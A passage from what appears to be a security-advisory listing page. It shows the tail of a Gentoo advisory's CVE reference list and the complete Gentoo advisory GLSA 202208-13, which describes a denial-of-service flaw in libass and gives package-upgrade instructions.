      https://nvd.nist.gov/vuln/detail/CVE-2022-28288  
[ 26 ] CVE-2022-28289  
      https://nvd.nist.gov/vuln/detail/CVE-2022-28289  
[ 27 ] CVE-2022-29909  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29909  
[ 28 ] CVE-2022-29910  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29910  
[ 29 ] CVE-2022-29911  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29911  
[ 30 ] CVE-2022-29912  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29912  
[ 31 ] CVE-2022-29914  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29914  
[ 32 ] CVE-2022-29915  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29915  
[ 33 ] CVE-2022-29916  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29916  
[ 34 ] CVE-2022-29917  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29917  
[ 35 ] CVE-2022-29918  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29918  
[ 36 ] CVE-2022-31736  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31736  
[ 37 ] CVE-2022-31737  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31737  
[ 38 ] CVE-2022-31738  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31738  
[ 39 ] CVE-2022-31740  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31740  
[ 40 ] CVE-2022-31741  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31741  
[ 41 ] CVE-2022-31742  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31742  
[ 42 ] CVE-2022-31743  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31743  
[ 43 ] CVE-2022-31744  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31744  
[ 44 ] CVE-2022-31745  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31745  
[ 45 ] CVE-2022-31747  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31747  
[ 46 ] CVE-2022-31748  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31748  
[ 47 ] CVE-2022-34468  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34468  
[ 48 ] CVE-2022-34469  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34469  
[ 49 ] CVE-2022-34470  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34470  
[ 50 ] CVE-2022-34471  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34471  
[ 51 ] CVE-2022-34472  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34472  
[ 52 ] CVE-2022-34473  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34473  
[ 53 ] CVE-2022-34474  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34474  
[ 54 ] CVE-2022-34475  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34475  
[ 55 ] CVE-2022-34476  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34476  
[ 56 ] CVE-2022-34477  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34477  
[ 57 ] CVE-2022-34478  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34478  
[ 58 ] CVE-2022-34479  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34479  
[ 59 ] CVE-2022-34480  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34480  
[ 60 ] CVE-2022-34481  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34481  
[ 61 ] CVE-2022-34482  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34482  
[ 62 ] CVE-2022-34483  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34483  
[ 63 ] CVE-2022-34484  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34484  
[ 64 ] CVE-2022-34485  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34485  
[ 65 ] CVE-2022-36315  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36315  
[ 66 ] CVE-2022-36316  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36316  
[ 67 ] CVE-2022-36318  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36318  
[ 68 ] CVE-2022-36319  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36319  
[ 69 ] CVE-2022-36320  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36320  
[ 70 ] MFSA-2022-14

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-08

Gentoo Linux Security Advisory 202208-13 - A vulnerability in libass could result in denial of service. Versions less than 0.15.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202208-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: libass: Denial of service  
     Date: August 10, 2022  
     Bugs: #803119  
       ID: 202208-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability in libass could result in denial of service.

Background  
=========  
libass is a portable subtitle renderer for the ASS/SSA (Advanced  
Substation Alpha/Substation Alpha) subtitle format.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-libs/libass          < 0.15.1                    >= 0.15.1

Description  
==========  
A one-byte buffer overwrite in ASS font decoding could trigger an  
assertion failure resulting in denial of service.

Impact  
=====  
An attacker with control over the ASS track input to libass via an application using it could trigger a denial of service.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libass users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libass-0.15.1"

References  
=========  
[ 1 ] CVE-2020-36430  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36430

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202208-13

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#mac